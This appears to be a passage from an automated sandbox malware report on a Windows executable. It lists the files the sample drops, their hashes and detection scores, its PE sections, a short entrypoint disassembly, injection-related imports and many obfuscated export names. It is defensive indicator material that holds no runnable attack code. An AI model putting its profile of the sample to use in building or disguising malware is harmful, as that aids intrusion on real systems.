SSDEEP:	24:EtPRDylURga5drbvrlpc766+VJH9C128zWGdZNuqrIAo6D3IA6txbE9xu:EtP5ylURVrrlEA39IzWGRuqIQ3I9bEi
MD5:	A36C703963B3D83911B4B163BFFBEF84
SHA1:	212176E9967846628EC06D95983D83BBA9515F49
SHA-256:	0E5D0BD68E411D0032BAEDAA13CB2BDF27C898BC4B901B96BC031FCBB3570AE7
SHA-512:	495D6FF03CDF1110A03C486E4DFCDB063EAF8DBCE08EF493CE766123982E71E24203FE9B02A17D611AC43AE4C7DB58643E2A5F4E690769D938F32DEC49C43965
Malicious:	false
Preview:	........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....\|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O......v.c.].nH..........,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ...%.}H..J.C.g.....K...bG.d..(c=............. .......@...7E.w...E.~.....4.....o.........IBR^8P.....d.....$..m.B(..0L3.)...l..l...<x...I..J..!....../.\L....&....d......E..Y.=[-...t..r.E:..-k2.......$.@..B{{......>f8z...6....E....feD.....]....EbR...g..C(6).m^.....3.%&."M..Tlu..........9..8>D.......V..!.}..H(....J..XE..t......U6.........A...[P5.W..v.. .......QA..7)/.\|.$.6i/Th6....#..sm..PV,_.95.!..oD....9....i....x...a.7....]I..8.. N.K.'j..5...u4.;W-.=d.\|..]...r9.[{?dy.....St..oW.p.6/..7[.L7.....+.{.......-e.\........n..,\.t...tu......\|.:~y..)...hX..P^.....kA.H....I.]"{.f#}N....^A.r-x...y...~...A.MaG%...fDU....a#......!s.p.L...i8`.z,..SG. .U..$Nw.

C:\Users\user\pigalicapi.exe

Download File

Process:	C:\Users\user\Desktop\6gjnnBAbpc.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	259072
Entropy (8bit):	6.79469395524113
Encrypted:	false
SSDEEP:	6144:UYf6pfKeeeeeeuPUn+AQTGTDFNDlzZID9+K7JPF:T6pieeeeeeupIDT7II0j
MD5:	9FAEA65CFF61AD64E4BC4C3913C336BE
SHA1:	4FAC3A2B3E76EE1B31A369ED53D145218952A340
SHA-256:	987204CA82337F0A3F28097A5D66D5F3ECB11D43D82F67CD753D0BF2CE40B7A7
SHA-512:	A0F3AD6C82C5FB830DD1C7A3A10E2B4CEE2E2C7B02527A64A87A0B11CE16961A6FCABB74635822882F3C689A3A7283256BC97A5499C8022F8F53F9950210C142
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 30%
Joe Sandbox View:	Filename: mj3Lf2ulDf.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.d..........................................@..........................`......"......... ......................0...s...............W...................@..........................................................(............................text..............................`.P`.data....J.......L..................@.`..rdata...).......*..................@.`@.bss......... ........................`..edata...s...0...t..................@.0@.idata...............p..............@.0..CRT....8...........................@.0..tls.... ...........................@.0..rsrc....W.......X..................@.0..reloc.......@......................@.0B................................................................................................................................................................................................................................

C:\Users\user\pigalicapi.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\6gjnnBAbpc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.79469395524113
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6gjnnBAbpc.exe
File size:	259072
MD5:	9faea65cff61ad64e4bc4c3913c336be
SHA1:	4fac3a2b3e76ee1b31a369ed53d145218952a340
SHA256:	987204ca82337f0a3f28097a5d66d5f3ecb11d43d82f67cd753d0bf2ce40b7a7
SHA512:	a0f3ad6c82c5fb830dd1c7a3a10e2b4cee2e2c7b02527a64a87a0b11ce16961a6fcabb74635822882f3c689a3a7283256bc97a5499c8022f8f53f9950210c142
SSDEEP:	6144:UYf6pfKeeeeeeuPUn+AQTGTDFNDlzZID9+K7JPF:T6pieeeeeeupIDT7II0j
TLSH:	C6444B18DE73AC75DCE304731052FE7AF1799E824B266B91F7849EBBE46286D70042D8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.d..........................................@..........................`......"......... ......................0...s.

File Icon


Icon Hash:	7af8e0c2f288c9b2

Static PE Info

General

Entrypoint:	0x4014e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:
Time Stamp:	0x64184C09 [Mon Mar 20 12:05:29 2023 UTC]
TLS Callbacks:	0x40ca60, 0x40ca10, 0x410a40
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6e82b26469ac662e23ea9fbbf84e95db

Entrypoint Preview

Instruction
sub esp, 0Ch
mov dword ptr [00422054h], 00000001h
call 00007FD3651734E3h
add esp, 0Ch
jmp 00007FD36516720Bh
lea esi, dword ptr [esi+00000000h]
sub esp, 0Ch
mov dword ptr [00422054h], 00000000h
call 00007FD3651734C3h
add esp, 0Ch
jmp 00007FD3651671EBh
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 0000008Ch
mov dword ptr [ebp-54h], 00418AA0h
mov dword ptr [ebp-50h], 004190F4h
lea eax, dword ptr [ebp-4Ch]
lea ecx, dword ptr [ebp-18h]
mov dword ptr [eax], ecx
mov edx, 004016A7h
mov dword ptr [eax+04h], edx
mov dword ptr [eax+08h], esp
lea eax, dword ptr [ebp-6Ch]
mov dword ptr [esp], eax
call 00007FD3651741CDh
mov dword ptr [ebp-1Ch], 00000000h
mov dword ptr [esp+18h], 00000000h
mov dword ptr [esp+14h], 00000000h
mov dword ptr [esp+10h], 00000003h
mov dword ptr [esp+0Ch], 00000000h
mov dword ptr [esp+08h], 00000001h
mov dword ptr [esp+04h], 80000000h
mov eax, dword ptr [ebp+0Ch]
mov dword ptr [esp], eax
mov eax, dword ptr [0042B2D4h]
mov dword ptr [ebp-68h], FFFFFFFFh
call eax
sub esp, 1Ch
mov dword ptr [ebp+00h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x23000	0x73dc	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2b000	0xfa8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x157d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x44000	0x1604	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2d000	0x18	.tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b2b4	0x228	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x181f4	0x18200	False	0.3972433613989637	data	5.9030621283777664	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x1a000	0x4a80	0x4c00	False	0.006064967105263158	data	0.03762435831140418	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x1f000	0x29b4	0x2a00	False	0.3423549107142857	data	5.334239092407127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0x22000	0x498	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x23000	0x73dc	0x7400	False	0.7158203125	data	6.216485591208954	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.idata	0x2b000	0xfa8	0x1000	False	0.397705078125	PGP symmetric key encrypted data - Plaintext or unencrypted data	5.301412463611171	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x2c000	0x38	0x200	False	0.07421875	Matlab v4 mat-file (little endian) \360\312@, numeric, rows 4198704, columns 0	0.31735749529006907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x2d000	0x20	0x200	False	0.05078125	data	0.22091378450968063	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2e000	0x157d4	0x15800	False	0.7982944222383721	data	7.78460791495336	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x44000	0x1604	0x1800	False	0.75537109375	data	6.441087456149082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
OMT	0x2e180	0xada	data	English	United States
OMT	0x2ec5c	0x14800	data	English	United States
RT_ICON	0x4345c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_MENU	0x43744	0x7a	data	English	United States
RT_GROUP_ICON	0x437c0	0x14	data	English	United States

Imports

DLL	Import
COMDLG32.DLL	GetOpenFileNameA, GetSaveFileNameA
GDI32.dll	GetStockObject
KERNEL32.dll	AddAtomA, CloseHandle, CreateEventA, CreateFileA, CreateMutexA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, GetAtomNameA, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFileSize, GetHandleInformation, GetLastError, GetModuleHandleA, GetProcessAffinityMask, GetStartupInfoA, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, GlobalAlloc, GlobalFree, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedExchangeAdd, InterlockedIncrement, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, ReleaseMutex, ReleaseSemaphore, ResetEvent, ResumeThread, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnhandledExceptionFilter, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WriteFile
msvcrt.dll	__dllonexit, __getmainargs, __initenv, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthreadex, _cexit, _endthreadex, _fmode, _ftime, _initterm, _iob, _lock, _onexit, _setjmp3, _unlock, _write, abort, calloc, exit, fprintf, fputc, fputs, free, fwrite, longjmp, malloc, memcmp, memmove, printf, realloc, signal, sprintf, strcmp, strncmp, vfprintf
ntdll.dll	LdrAccessResource, LdrFindResource_U, NtAllocateVirtualMemory, NtQueueApcThread, NtTestAlert, ZwOpenSymbolicLinkObject, memcpy, memset, strlen
USER32.dll	CreateWindowExA, DefWindowProcA, DestroyWindow, DispatchMessageA, GetDlgItem, GetMessageA, GetWindowTextA, GetWindowTextLengthA, LoadCursorA, LoadIconA, MessageBoxA, MoveWindow, PostMessageA, PostQuitMessage, RegisterClassExA, SendDlgItemMessageA, SetFocus, SetWindowTextA, ShowWindow, TranslateMessage, UpdateWindow

Exports

Name	Ordinal	Address
AEpOoiJMiCSWcbYnHlrWbf	1	0x404ba2
AHUhwewOpPRNuG	2	0x403162
AMeCRaWpbpxmrsgtmppTeTtAc	3	0x40463e
AMzmHUCLVtvT	4	0x404aee
ANblWxUhGqWnSTLTMvSdjhU	5	0x4024ec
AOEKCxmhkZnttJbYldozVJafO	6	0x402c26
ARdJAGMxpCY	7	0x402fbe
AVPiutHdGWjPPKJsFbuI	8	0x402b04
AXoxfPNEhWJjgxoAprWfI	9	0x40260e
AaEgFxggyfwuvXqDGDPrS	10	0x4048d2
AcQLEpOlLrOjVFaUm	11	0x402f96
AdeFNhYEvbXqdOMpskSeWL	12	0x404b7a
AfEElzpypQ	13	0x4044fe
AgPMkmJ	14	0x402866
AhSfXiZgtFRqZ	15	0x402488
AkJqGJZWGnb	16	0x4028f2
AtoCngQXkTuLzyMiSLPu	17	0x4037c0
AvJQmHPrKhcudfTQnlJXkbFG	18	0x40369e
AxTjSJmvgULHwbmnigQjI	19	0x40364e
AyZboYbziPrb	20	0x403d88
BAyNFQeXNmGbUtoa	21	0x402a5a
BDecvVYgLqpEjseku	22	0x404d0a
BFVGBhMiS	23	0x40389c
BIqUDyCdccMUzOuIe	24	0x403d06
BJIwyXlEIBEtadoceIzXexcjW	25	0x4033a6
BKdiVcfNYpIZzXbVOJMX	26	0x40435a
BKxbmqtxDdX	27	0x404ee0
BLBPztaKFHwNkodSWkKnlSJPOo	28	0x402a64
BMNlMYOFHOl	29	0x4043aa
BNYErCQsUBXjDBMDKuxTelScJs	30	0x4027d0
BOtmJaHVOonqr	31	0x4025dc
BRpPjScOF	32	0x404bca
BRvGEXkjv	33	0x403194
BUTesG	34	0x402956
BWNihbzofGIOnfvXpChJszWsw	35	0x404008
BYDOmIdQp	36	0x402ed8
BYzYCzWRLWBl	37	0x40278a
BaHjBokXd	38	0x4049a4
BcONkuhxapUgDLEt	39	0x40355e
BciQPWqVdaLhIUosSizTvq	40	0x403572
BeuTxQgyVQSu	41	0x4045ee
BfKBiRTLzyEKhNPmudKn	42	0x4040a8
BfgbcGP	43	0x403e32
BgqXJous	44	0x402fb4
BhmSofxNBIYHOGgKAnYRs	45	0x402bcc
BktFhXZTrpWEJ	46	0x403626
BnZKole	47	0x404b52
BqRWlFxBvlSrMOF	48	0x402b22
BtnrYxgnXpxV	49	0x404698
BuuuxuV	50	0x404df0
BxatiKbuNMuBPw	51	0x402a32
BxhtljuZFnWmsudYHkuLe	52	0x40387e
CAViNITOPjtFddmYBD	53	0x403964
CBFRUiZ	54	0x404d6e
CCwHnqdY	55	0x403432
CDVGBpJxdAkvI	56	0x402d66
CFPQoDgGxYjU	57	0x404364
CGvFAzAzFfxtDrywfDgiQfv	58	0x402492
CGvxYVwfYq	59	0x4032d4
CJLDpmovpSx	60	0x403d6a
CKZbGtGqnffVD	61	0x404c56
CKcMhyllvQCmEAkRVGZWukxaL	62	0x404742
CLQeusRIG	63	0x404bde
CLtDsGelLQoQDcnInGThjZYL	64	0x4046d4
CNmrTqPpxr	65	0x40331a
COWjgnrCTQY	66	0x404ddc
CPGaASAaIlbPydOIriQcbk	67	0x403fea
CRoPMVqE	68	0x403284
CUEwJDDkEEIqpRqYekrlMQLVs	69	0x4040ee
CVGMAmyMy	70	0x4043b4
CXiGlJPjnnMsdpsjrUZnAEMnR	71	0x403b6c
CZqWVEDWXPJjdfqRIBNGAlFx	72	0x402e10
CfCCujSdLLokKYrdgWlfEQCb	73	0x404d96
CfhAOYwWeGpbe	74	0x40460c
ChztDpuvg	75	0x4024ba
ClMvIifjwUzqEHRKDlg	76	0x40398c
CmECGbHMRoqMmvjXpEjkPH	77	0x4045e4
CnbDbzlJCfACAu	78	0x40393c
CsRdjuHCKyQEdAQ	79	0x4048a0
CuGzgNTXbUxNYkXIpe	80	0x402708
CuSYqHl	81	0x404d1e
CwPZGCAKSU	82	0x403554
CzSGUpMQwursFjejygmPNAOCs	83	0x402924
DByfLaLNMsJItflZRR	84	0x402fdc
DChxRgOZswgfHHzjh	85	0x402f46
DFYlwLLLakDbBIvmnzOR	86	0x4040da
DKJzmuLbiWzEGGBtSHjwNsOK	87	0x403176
DLxOYqwNNTSlMEEqURgjNLsM	88	0x4030f4
DPGFHkwiNDPg	89	0x403fe0
DUaBKBFzMuLrqGUCb	90	0x404e72
DYMKjYTuNILjTjQfIICHkkG	91	0x40311c
DgVrPPXMVAvvywZneyMKhmIwb	92	0x403aea
DiQNcjP	93	0x403e5a
DlLRBLkaPf	94	0x404878
DlesfGVrpIriJ	95	0x403ca2
DlvfHGKybdUKdwyLE	96	0x4039fa
DunqLlQOcbuRQihzhiuouh	97	0x402f82
DvAeflTcx	98	0x4025c8
DzvnBEkczu	99	0x403676
ECfgZvHHvKxgVTS	100	0x4024c4
ECjMeBlicJbxnnLhyEbgXlH	101	0x402bd6
EDcquBPzmqXJeAmWiU	102	0x4039e6
EFdSMhOpAiy	103	0x4032a2
ERfEIinmXhLDvLz	104	0x40246a
ERqWjqUGVtIIKHYLc	105	0x404f26
EUgrKxKtNMXgDTf	106	0x402b40
EVSKHBkuRnme	107	0x404058
EWdgvhukQ	108	0x402546
EXEjMTf	109	0x402c80
EexlucJD	110	0x404f12
EgAuYTEjIRqrbxzmQFKJr	111	0x403ad6
EhporYMXnSSHtncsUEU	112	0x40297e
EmBcacTmBJtkf	113	0x4042ce
EnrKRJSDwEmyiyIxrQpKq	114	0x4041a2
ErowWyVfXgzoggN	115	0x402e56
EttLYpeACwhHjuDTTyWEf	116	0x40346e
EwiBKQZ	117	0x404e90
ExoedEngKLbJrqusiVTqxy	118	0x4047d8
EyqJLJREYpceROoWKQRWH	119	0x4040e4
EzXqWv	120	0x402a14
EznbCRIu	121	0x402f32
FCXZJLuGZnsizwmjCPyrKOt	122	0x403a7c
FGzTlRomGveUi	123	0x402884
FHZrMrH	124	0x402fa0
FKHZqPjovpPlsEKAK	125	0x4027bc
FODZsSwJjeMhEhyzExKYimXx	126	0x403a5e
FVJxtsIxB	127	0x40480a
FVMIqqneQuCYrrwdlBzqGeel	128	0x404a6c
FYaMvm	129	0x402672
FeJUFTCSgOLEjCxf	130	0x4046fc
FfPesHRfwIsqb	131	0x402c44
FfgRIVUzPvRHzk	132	0x402cc6
FmABMFxYPAsbwUKJ	133	0x4045da
FmijZMkGGdffG	134	0x4048c8
FolTdqKwTklpgSyKJHrwOjMqn	135	0x404a8a
FrFyONQlBzTuXWI	136	0x403ee6
FtwIppaZ	137	0x4046e8
FwbHAbd	138	0x40322a
FwpXopZGMgkaIdk	139	0x402f5a
GINzLaSeIVRi	140	0x4034d2
GJecxupoygEkbVUIo	141	0x4043f0
GKdVlpiAzsCplNXFUQLJUcvBE	142	0x404b84
GKizWJmbeWX	143	0x404b16
GLRzGyWZukHmqBqTsBlzeVvr	144	0x404c2e
GLdhqLNUVVTO	145	0x403c3e
GQHkQQDkcnnfZUkgdygbww	146	0x402a78
GRaaUDLLHwDAOaBWWe	147	0x404bd4
GWzMZxxsdYUIwUAAOriqvYFXU	148	0x4040c6
GZHeKJazfKbblyspUWfJE	149	0x403a72
GZSTiOvFSdYKPbamTG	150	0x403e46
GdiAWzJEdmVUHCUDDc	151	0x404576
GeQyVPpaGDMnoqDL	152	0x4029b0
GeYDpsHQNqoLXItMFXUlb	153	0x403248
GiVoTgxpmnWDPOvRqmMvo	154	0x402d3e
GjVHQRt	155	0x402e42
Gllvgm	156	0x404288
GmAUywAK	157	0x4047e2
GnUPVhyLnXIuWuWHFbVQqHnha	158	0x402910
GojlwLTnFuXPfLJzkvojZr	159	0x4033ec
GsYOIuShI	160	0x402848
HDfSYpCyvGnJRzaTsKLLf	161	0x404300
HIksXPxMnMeigvnkJv	162	0x404db4
HLEdzNfWCWIdspzc	163	0x403068
HMMhwoXbBjPIwCXBWqLlv	164	0x404850
HMYKScpmsgck	165	0x4042f6
HOmpRabdfTXOEtNgQnmSxjz	166	0x40373e
HQxLwmHbfmtAhQqtvqzbWtFMwE	167	0x4037b6
HTZjucjzLDctXaCYnbuqdHMmx	168	0x4044a4
HVNqTuuDArtLBIEWDaZ	169	0x403090
HWqqoNERuCVNKdVZahnR	170	0x402e74
HZUnNOsQzCvVltLxSMp	171	0x40490e
HbDtvYXUrxqIeUpBZreSYgJ	172	0x403e0a
HdxxZgdq	173	0x4044b8
HefYteHXeNoeOKr	174	0x403a54
HfchRaLXpbaTWHPbtWmypNNKg	175	0x402fc8
HkgaYOjnVjKtQuxwRqeDtCw	176	0x404a26
HpSDhHg	177	0x403144
HqKeCcTyhkGxvTD	178	0x403bda
HqnvXzjbIOrlToQeCxxUqyiWNm	179	0x4039be
HsiTJUEZAlOcQEsfiM	180	0x403f86
HzOILChEKEqDjfenF	181	0x402474
IBDQWEnjRjGYLUfC	182	0x404990
IBcTFqhRroLkRXpzqFyJJhAEP	183	0x403d9c
IEbkKo	184	0x403fb8
IGkEMfsg	185	0x403464
IJTiqSd	186	0x403306
IQkOTDhNncMNLz	187	0x403720
IQyYTEvhMbcsX	188	0x403b9e
ISnJiSIOLeORalNzJkIDW	189	0x403b58
ISrLVOlqNf	190	0x404cc4
ITLInwPbn	191	0x403b8a
IUgSFxyvWMFMBvFuYRBaT	192	0x40403a
IVDhNShKVyAu	193	0x40359a
IVajLOJZ	194	0x40433c
IWXgQlkOggVKjFzB	195	0x403770
IhNhTMw	196	0x4037fc
IkjHdeFtd	197	0x402e24
IlPbrDbw	198	0x4032f2
InRqSLBlEhIkjNigArZjmOGnJ	199	0x404e04
IpDUggvXhCFvqBp	200	0x4046de
IpRxrytbpAeWJsLfvVv	201	0x402aa0
IqrzMDsyLvvljaJhHhML	202	0x4026f4
IvbWErhBTqsZLvMHteFvxpJppw	203	0x404d32
IxyvKDZrjzOmXVIkISacDd	204	0x403cc0
IyOIxPveuAaNE	205	0x40494a
IyrRYweYqN	206	0x4027e4
JDtXJRBCRipVr	207	0x4044ea
JOqyrwwgoQz	208	0x402c9e
JPNwfH	209	0x402744
JRLwEypfKPzV	210	0x404346
JRRTHJatxgteuNUoDL	211	0x40282a
JRnmecW	212	0x404120
JVuBFKTVzct	213	0x402bf4
JWiCWNlmUpnNpHiaG	214	0x402e7e
JXJWEBXUnRs	215	0x40340a
JddjtiZhh	216	0x4026e0
JeumwKRe	217	0x403d60
JfyTutyzgAdVSxAN	218	0x4031da
JhhyHPklXRXw	219	0x40251e
JoUrgsEd	220	0x403d7e
JwVamoLkhWqqsvgq	221	0x404472
JxtfgJZTmHkbHnHkQwrOVA	222	0x403cfc
JyQUYCvZnxBTBnc	223	0x402550
JzixyaUweVcDO	224	0x40247e
KEPjNIMHgpSGzlYaBeN	225	0x404774
KGNkdCvNAylaCDcdzBDeFPIBBS	226	0x404148
KKIeLtPd	227	0x4031f8
KPzVeJjCdgZFErT	228	0x402460
KQAyMHtBTgRcNZRnSBd	229	0x403e8c
KQHxsikxLLcHKe	230	0x404256
KRipSwFFZVmtHtuHo	231	0x403518
KUZqRXXizJOFRIBCgrOpL	232	0x404da0
KUpzzufnZcvpFVGYRQgvXA	233	0x404bc0
KVnkwizroQhBFRzRSPoK	234	0x404ad0
